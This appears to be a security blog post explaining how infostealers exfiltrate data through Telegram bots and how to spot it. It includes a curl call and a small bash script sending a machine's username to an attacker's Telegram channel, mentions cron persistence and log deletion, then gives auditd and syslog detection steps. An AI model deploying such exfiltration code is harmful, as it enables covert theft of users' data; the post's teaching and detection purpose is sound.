One of the most prominent threats right now is Infostealers. These would be a kind of malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated in other attacks (f.e. ransomware) it could work on its own, for selling, cyber espionage and more.
In the past months, one of the most popular exfiltration attempts was done through Telegram or Discord bots (as well as C2-Command and Control attempts).
I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!
Telegram bot
In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:
https://api.telegram.org/bot<BotToken>/getUpdates
As described here, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:
curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'
Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the whoami output for the sake of the example. Of course, this could include way more things such as architecture, disk info and more. Most of there sort of samples will attempt to also check crypto wallet info.
Anyway, let's say we have the following script:
#!/bin/bash
messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"
curl $mycommand
When this is executed, the username is sent to the channel.
Now, most of these will install the script in cron usign crontab and delete the history log.
In case the crontab log is still intact, we will be able to see the crontab edition using cat /var/log/syslog | grep -w 'crontab'. But let's explore a cool option: auditd
Now, installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!
Now, if we use sudo cat /var/log/audit/audit.log | grep telegram | grep api we would be able to see the attempt of our script!
Sometimes these attacks include messing up the /var/log so maybe having a backup in a different path could be useful, too.
Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )
If you are curious about analyzing real life samples, take a look at my older posts about setting a custom Linux Honeypot. Most of the things I capture are miners, which could use some common characteristics with info-stealers (messing up with cron for persistence, attempting enumeration, attempting Dynamic Linker Hijacking attack, and more).
Top comments (2)
The exfiltrator stores their API key in plain text? Or is that encrypted somehow?
time well spent reading this ++